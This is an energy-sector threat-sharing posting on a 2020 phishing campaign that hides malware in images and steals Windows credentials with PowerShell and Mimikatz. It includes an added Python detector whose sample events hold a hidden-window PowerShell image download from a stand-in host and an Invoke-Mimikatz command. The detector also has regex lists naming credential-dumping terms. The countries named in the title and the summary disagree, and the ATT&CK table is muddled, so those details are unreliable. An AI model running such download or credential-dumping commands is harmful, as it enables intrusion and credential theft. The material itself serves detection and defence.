Malware Targets Supply Chains of Japan, Italy, and Germany

Posting ID 125039
Date Added: 06/8/2020 3:33 PM EDT
Date Modified: 06/8/2020 4:35 PM EDT
E-ISAC Staff

Description

Summary:

In May of 2020, cyber security firm Kaspersky reported a form of malware allegedly targeting the supply chains of industrial organizations in the energy sector in Italy, the UK and Germany. 

Analysis:

Initial delivery is through a phishing email specifically tailored to its target that contains a malicious MS Office document. When a user interacts with the document, a script is triggered that downloads an image with the new malware hidden inside it. Using steganography to hide code in images is a known attack technique because of its effectiveness; code embedded in images is difficult for antivirus and other IDS devices to detect. The malware hidden in the image then executes a PowerShell script that eventually leverages Mimikatz to steal Windows credentials.
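As an added detection example (not part of this posting or of the Kaspersky report), the Python below flags process-creation events that match the chain just described: an Office application spawning PowerShell, a script downloading an image, and a later Mimikatz invocation. The Sysmon-style JSON events, the path constants and the regex rule lists are constructed assumptions for illustration.

```python
# Added example (not from the report): flag process-creation events that match
# the chain above (Office -> PowerShell -> image download -> Mimikatz). Events
# are constructed Sysmon-style JSON lines, not real telemetry.
import json
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient", re.I)
IMAGE_RE = re.compile(r"\.(?:png|jpe?g|gif|bmp)\b", re.I)
CREDTOOL_RE = re.compile(r"mimikatz|sekurlsa|logonpasswords", re.I)

def basename(path):  # lower-cased file name from a Windows or POSIX path
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def classify(event):
    """Return the rule names a process-creation event triggers ([] if none)."""
    reasons = []
    if basename(event.get("Image", "")) not in POWERSHELL:
        return reasons
    cmd = event.get("CommandLine", "")
    if basename(event.get("ParentImage", "")) in OFFICE_PARENTS:
        reasons.append("office-spawned-powershell")
    if DOWNLOAD_RE.search(cmd):
        reasons.append("powershell-download")
        if IMAGE_RE.search(cmd):  # a script fetching an image: possible carrier
            reasons.append("image-download")
    if CREDTOOL_RE.search(cmd):  # plain-string match; obfuscated loaders evade it
        reasons.append("credential-dumping")
    return reasons

def scan(json_lines):
    """Return [(ProcessId, [rule, ...]), ...] for every event that matches."""
    hits = []
    for line in json_lines:
        event = json.loads(line)
        reasons = classify(event)
        if reasons:
            hits.append((event.get("ProcessId"), reasons))
    return hits
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
SAMPLE_EVENTS = [json.dumps(e) for e in (  # constructed: one benign, two malicious
    {"ProcessId": 3100, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
    {"ProcessId": 4120, "Image": PS, "ParentImage": WORD, "CommandLine":
     r"powershell.exe -w hidden -c Invoke-WebRequest https://example.invalid/logo.png -OutFile C:\Users\Public\logo.png"},
    {"ProcessId": 4188, "Image": PS, "ParentImage": PS,
     "CommandLine": "powershell.exe -c Invoke-Mimikatz"},
)]
```

Running scan(SAMPLE_EVENTS) reports the Word-spawned PowerShell download of an image and the later Mimikatz invocation, and leaves the Notepad event alone.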

Impact:

Targeted malware of this nature can result in the disclosure of legitimate network credentials to an adversary. Adversaries use such credentials to “live off the land” in a target’s environment, in part because misuse of legitimate network credentials is difficult to detect.

MITRE ATT&CK Mapping:

Technique Identifier | Tactic                   | Technique Title
T1193                | Spearphishing Attachment | Powershell/Mimikatz

What to Do:

A robust and ongoing cyber security awareness program that includes training personnel on how to recognize and report phishing and suspicious emails can assist in stopping malicious emails from entering your environments. Additionally, evaluating and understanding the cyber security program at trusted suppliers is important in maintaining a relationship built on mutual trust.

References:

Kovacs, Eduard (2020). Industrial Suppliers in Japan, Europe Targeted in Sophisticated Attacks. SecurityWeek. Retrieved May 28, 2020, from https://www.securityweek.com/industrial-suppliers-japan-europe-targeted-sophisticated-attacks?&web_view=true

VirusTotal file report. Retrieved from https://www.virustotal.com/gui/file/cb9e7cae11788bb2cd3a41536ec072e89c0aa691d396a9d24b1d8ccc4418a638/details

Goodin, Dan (2020). An advanced and unconventional hack is targeting industrial firms. Ars Technica, May 30, 2020. Retrieved from https://arstechnica.com/information-technology/2020/05/an-advanced-and-unconventional-hack-is-targeting-industrial-firms/

Kaspersky ICS CERT (2020). Steganography in Targeted Attacks on Industrial Enterprises. Retrieved from https://ics-cert.kaspersky.com/reports/2020/05/28/steganography-in-targeted-attacks-on-industrial-enterprises/

Category Type:
Cyber Security
TLP - White
Shared Count (15)
  • Canadian CERTs
  • CRISP - Cyber Risk Info Sharing Program
  • DHS - NICC, NCCIC, US-CERT, etc
  • DNG-ISAC
  • DOE Complex
  • E-ISAC AOO Members
  • E-ISAC Staff
  • FBI, LE Fusion
  • FERC - OEIS, etc
  • FS-ISAC
  • International (other ISACs, CERTs)
  • MS-ISAC
  • Other (inc. local/state commissions)
  • Trade Organizations
  • Watch Floor
Change History
  • E-ISAC Staff, 06/08/2020